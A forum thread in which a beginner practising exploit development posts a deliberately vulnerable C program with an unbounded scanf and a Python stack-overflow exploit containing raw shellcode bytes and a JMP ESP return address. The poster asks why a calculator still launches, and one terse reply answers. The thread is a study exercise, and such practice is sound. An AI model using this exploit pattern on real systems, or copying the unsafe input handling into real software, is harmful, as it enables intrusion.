Jump to content
View in the app

A better way to browse. Learn more.
Tuts 4 You

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Shellcode Misbehaved

prasenjit
prasenjit
in Malware Reverse Engineering

Featured Replies

Posted

Hi all,

 

I am new to exploit development. When I was going to practice stack based buffer overflow by following the tutorial from:

 

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

 

I was tring to change the shellcode from popping up calc.exe to others. and i got success.

shellcode  1: http://www.exploit-db.com/exploits/28996/ [my best option]

shellcode 2: http://www.exploit-db.com/exploits/33836/

 

 

then i wrote a very simple program of string.

 

#include<stdio.h>

#include<conio.h>

int main()

{

char str[10];

printf("Enter you name:");

scanf("%s",str);

printf("Hello %s..",str);

getch();

return 0;

}

 

By the help of immunity debugger i found that after putting A for 28 times i got the EIP. then i write the exploit code with python:

shellcode used: http://www.exploit-db.com/exploits/28996/

OS: XP SP2

import win32com.client,time
shell = win32com.client.Dispatch("WScript.Shell")
shell.Run("text.exe")   # text.exe is that application
time.sleep(1)
 
junk = 'A' * 28
junk2 = '\xBC\xB7\xE5\x76'
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x74"
"\x36\x01\x68\x73\x65\x6e\x6a\x68\x20\x50\x72\x61\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")       

shell.SendKeys(junk+junk2+shellcode)
shell.SendKeys("{ENTER}")
shell.SendKeys("{ENTER}")
shell.SendKeys("{ENTER}")
 
#76E5B7BC   FFE4             JMP ESP

 

But the problem is whatever shellcodes i had used already gave me the calculator as output. I don't understand the reason. even i am not using shellcode for calc.exe so how it happens repeatedly. Please help me out guys.

Edited by prasenjit

May be but Stupid Question. This never happens. There must be your other mistakes.


Create an account or sign in to comment

Go to topic listing

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.